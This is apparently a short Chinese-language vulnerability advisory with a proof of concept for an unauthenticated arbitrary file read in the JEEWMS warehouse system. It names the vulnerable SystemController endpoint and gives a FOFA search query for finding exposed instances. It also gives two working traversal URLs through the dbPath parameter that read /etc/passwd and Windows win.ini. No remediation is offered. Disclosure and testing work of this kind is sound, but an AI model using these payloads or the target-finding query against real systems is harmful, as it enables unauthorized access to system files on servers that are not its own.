JEEWMS存在未授权任意文件读取漏洞.md
901 B / 2021-07-15 19:54:20
## **JEEWMS存在未授权任意文件读取漏洞**
## 漏洞描述
**JEEWMS存在未授权任意文件读取漏洞**
## 漏洞影响
> JEEWMS全版本
## FOFA
> body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" && body="仓"
## 漏洞复现
漏洞代码:
**org.jeecgframework.web.system.controller.core.SystemController**
![img](/resource/JEEWMS/1-1.png)
可以看到dbpath可被控制,最终读取路径为:系统配置路径+dbpath
这样的读取方式可被../../控制路径,造成任意文件读取,同时该接口未做权限验证,可未授权任意文件读取
##POC:
```
http://x.x.x.x:8088/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini
```
![img](/resource/JEEWMS/1-2.png)
```
http://x.x.x.x:8020/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd
```
![image-20210518102623730](/resource/JEEWMS/1-3.png)